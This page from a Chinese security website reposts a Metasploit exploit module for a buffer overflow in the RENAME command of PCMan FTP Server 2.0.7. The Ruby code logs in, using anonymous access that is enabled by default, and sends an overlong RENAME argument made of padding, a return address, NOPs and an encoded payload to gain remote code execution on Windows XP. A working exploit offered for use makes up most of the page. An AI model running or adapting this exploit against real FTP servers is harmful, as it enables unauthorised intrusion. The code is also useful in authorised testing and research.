首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)
来源:metasploit.com 作者:Smith 发布时间:2016-04-26  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
## Original Exploit Information ##
# Date:  29 Aug 2015
# Exploit Author: Koby
# Tested on: Windows XP SP3
# Link: https://www.exploit-db.com/exploits/38013/
 
## Software Information ##
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
 
## Metasploit Module Information ##
# Date:  16 April 2016
# Exploit Author: Jonathan Smith
# Tested on: Windows XP SP2
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
 include Msf::Exploit::Remote::Ftp
 
 def initialize(info = {})
 
 super(update_info(info,
 
    'Name' => 'PCMan RENAME overflow',
 
    'Description' => 'This module exploits a buffer overflow in the RENAME command of PCMAN FTP Server 2.0.7. This requires authentication but anonymous credentials are enabled by default.',
 
    'Author' => [ 'Metasploit module author: Jonathan Smith. Vulnerability originally discovered by Koby on 29 August 2015. Metasploit module developed 16 April 2016.'],
 
    'Version' => '$Revision: 1 $',
 
    'Platform' => ['win'],
 
    'Targets' => [ [ 'Windows XP SP2', { } ],],
 
    'DefaultTarget' => 0,
 
    'License' => GPL_LICENSE,
 
    'Payload' => {'BadChars' => "\x00\x0a\x0d"},
 
    'DefaultOptions' => {'EXITFUNC' => 'process'}
 
 ))
 
 end
 
def exploit
 
 connect_login
 
 exploitcode = "A" * 2004 + "\x65\x82\xA5\x7C" + make_nops(30) + payload.encoded
 
 send_cmd( ['RENAME', exploitcode] , false )
 
 disconnect
 
 end
 
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Gemtek CPE7000 - WLTCS-106 sys
·Rough Auditing Tool for Securi
·Gemtek CPE7000 - WLTCS-106 Adm
·HP Data Protector 6.10 / 6.11
·Advantech WebAccess 8.0 Dashbo
·Yasr Screen Reader 0.6.9 - Loc
·libgd 2.1.1 Signedness
·Texas Instruments Calculators
·Microsoft Windows 7-10 & Serve
·RATS 2.3 Crash Proof Of Concep
·Gemtek CPE7000 / WLTCS-106 - M
·Struts2 S2-032 checking tools
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved